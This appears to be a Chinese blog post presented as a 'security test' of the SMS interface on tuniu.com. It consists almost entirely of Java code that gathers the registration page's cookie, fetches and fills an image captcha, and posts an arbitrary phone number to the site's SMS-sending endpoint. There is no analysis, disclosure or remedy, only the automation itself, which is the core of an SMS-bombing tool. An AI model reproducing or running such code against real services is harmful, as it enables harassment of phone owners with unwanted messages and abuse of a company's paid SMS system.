安全测试 : 途牛旅游网(tuniu.com)网站短信接口安全测试
发布时间:2021-04-28 点击数:4552
安全问题不容忽视,不要亡羊补牢!
//配置请求头
inheads.put("Accept", "*/*");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Referer", "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect");
getCookie(cookieStore, httpclient, "https://passport.tuniu.com/register?origin=http://www.tuniu.com/ssoConnect", inheads, outheads);
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
//配置请求参数
List<BasicNameValuePair> paramsList = new ArrayList<BasicNameValuePair>();
paramsList.add(new BasicNameValuePair("tel", phone));
paramsList.add(new BasicNameValuePair("identify_code", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("intlCode", "0086"));
paramsList.add(new BasicNameValuePair("isReg", "1"));
//配置请求
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input, outMap);
input.put("imgCode", imgCode != null ? imgCode : "");
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);